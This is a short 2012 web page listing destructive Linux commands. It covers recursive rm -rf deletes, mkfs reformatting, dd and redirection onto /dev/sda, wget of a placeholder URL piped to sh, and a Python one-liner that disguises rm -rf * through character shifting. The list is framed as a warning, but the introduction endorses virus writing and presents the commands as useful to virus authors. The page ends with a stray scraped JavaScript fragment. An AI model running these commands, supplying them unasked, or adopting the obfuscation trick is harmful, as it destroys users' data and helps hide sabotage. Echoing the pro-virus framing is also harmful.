Black Book malicious linux command

Black Book malicious linux command by Branko D Tomic / Luxilius November 2012

Introduction
Insider: It is worthwhile to have some basic awareness about malicious commands in Linux. Today any provider in any country have spy in your private online web surfing. Online war for freedom never stop, and in that way virus author cann't be guilt. Then revolution against manipulation gives you some thoughts on how to "create a virus". When in doubt as to the safety of a recommended procedure or command, it is best to verify the command's function from several sources, such as from readily available documentation on Linux commands (e.g. manpages). Here are some common examples of commands that should raise a white flag of enemy. Remember these

can always be disguised as some obfuscated command or as a part of a long procedure, so the bottom line is to take appropriate caution when executing something.

Delete all files, delete current directory, or delete visible files in current directory
It's quite obvious why these commands can be sweet for virus author to execute. rm means remove, -f means "force" deletion (even if write protected), and -r means do it recursively, i.e. all subfolders. Therefore, " rm -rf / " means force a deletion of everything in the root directory and all subfolders. " rm -rf . " means to force deletion of the current directory and all subfolders. " rm -rf * " means to force deletion of all files in the current folder and all subfolders.
rm -rf / rm -rf . rm -rf *

Another variation of this, which would all force deletion of the current folder and all subfolders, would be:
rm -r .[^.]*

which will only exclude the parent directory ".."

Reformat Data on device

Whatever follows the mkfs command will be destroyed and replaced with a blank filesystem.
mkfs mkfs.ext4 mkfs.anything

Block device manipulation

These commands cause raw data to be written to a block device. Often this will clobber the filesystem and cause total loss of data:
any_command > /dev/sda dd if=something of=/dev/sda Malicious code in Shell scripts

Make and give the link to a shell script (executable from the command line interface using script execution command ./ ) and recommends to download and execute it. The script might contains any command what so ever -- whether benign or malevolent. Examples:
wget http://some_place/some_file sh ./some_file

or
wget http://some_place/some_file -O- | sh

Malicious source code to be compiled then executed

Monstrous example (in Python):
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

in which "sn!.sg!+" is simply the rm -rf * command shifted a character up in order to disguise it from casual examination. I wouldn't expect anyone with experience in Python to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong, but how many casual users are fluent in Python? if(window.mw){ mw.loader.load(["mediawiki.user","mediawiki.page.ready","ext.gadget.ZoomViewer","ext.gadget.UploadWi zard","ext.gadget.Long-Image-Names-in-Categories","ext.gadget.Stockphoto","ext.gadget.ExtraTabs2","ext. gadget.WikiMiniAtlas","ext.gadget.AjaxQuickDelete","ext.vector.collapsibleNav","ext.vector.collapsibleTab s","ext.vector.simpleSearch"], null, true);